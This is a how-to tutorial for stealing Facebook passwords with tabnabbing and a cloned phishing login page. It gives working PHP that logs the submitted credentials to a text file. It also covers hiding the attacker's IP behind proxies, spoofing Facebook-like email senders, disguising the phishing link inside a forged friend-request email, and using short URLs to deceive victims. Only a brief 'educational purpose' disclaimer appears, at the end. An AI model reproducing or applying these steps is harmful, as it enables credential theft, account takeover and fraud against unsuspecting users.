Hack Facebook using this Tabnabbin

How to Hack Facebook using this Tabnabbing Method

First of all you need a free hosting – I suggest 000webhosting , byehost.com .,ripway.com,100mb.com  You can use any other free hosting company.
Now , you need few files-

·         Facebook.html

·        login.php

·         Google.html

·         tabnabb.js

You can download these below -

<<<<< DOWNLOAD THE SCRIPTS  >>>>>

 

http://www.ziddu.com/download/20010142/Downloads.rar.html

 

·         After Downloading and Extracting the Files only upload Facebook.html , login.php, Google.html and dont upload tabnabb.js

·        After that open facebook.html and copy the link/url of facebook.html

·        Open tabnabb.js in notepad and search for Enter Your URL here.

·         Replace it with the url of your Facebook.html

·        Now upload tabnabb.js to your web hosting.

·        Now send google.html link to the victim.

·        To check weather this work or not open the google.html link and open any other tab and see after somewhile this redirects or not.

·        Now if the victim enters his details into the page then the password is yours.

Phishing WebPage:
     Creating webpage which look like any site is described as Phishing.  By creating Phishing WebPage, you can make users to believe that it is original website and enter their id and password.

Step 1:
Go to Facebook.com
Right click on the white space of the front page.  Select "View Page source".
Copy the code to Notepad.



Step2:
Now find (Press ctrl +f)  for "action="  in that code.
You fill find the code like this:

The big red ring that circles the action= you have to change. You have to change it to 'action="next.php" '. after you have done that, you should change the method (small red circle on the picture) to "get" instead of "post", or else it will not work. Save the document as index.html


Step 3:
Now we need to create the "log.php" to store the password.  so open the notepad and type the following code:

<php
header("Location: http://www.Facebook.com/login.php ");
$handle = fopen("pswrds.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

save this file as "next.php"

Step 4:
open the notepad and just save the file as "pswrds.txt" without any contents.

Now upload those three files(namely index.html,next.php,pswrds.txt) in any of subdomain Web hosting site.
Note:  that web hosting service must has php feature.
Use one of these sites:110mb.com, spam.com justfree.com or 007sites.com. 
 use this sites through the secure connection sites(so that you can hide your ip address)  like: http://flyproxy.com .  find best secure connection site.




Step 5:
 create an mail account with facebook keyword like :FACEBOOK@hotmail.com,Facebook@noreply.com,facebook_welcome@hotmail.com,facebook_friends@gmail.com

Step 6 :

You may get Facebook friendship invitation from Facebook when someone "add as a friend", right? Just copy that mail and paste in compose mail.  In that content , you can find this link http:/www.facebook.com/n/?reqs.php .  Just change the delete the link and create link with same text but link to your site.  

Add hyperlink button in the red circle. now write your phisher page url in the hyperlink bar that appears after clicking the button. and click add. The hyperlink should still display http:/www.facebook.com/n/?reqs.php
but lead to your phisher page.. 


Note:
strictly this is only for educational purpose ...don try on others!!! 

For user to believe change Your phishing web page url with any of free short url sites. 
Like : co.nr, co.cc,cz.cc 
This will make users to believe that it is correct url.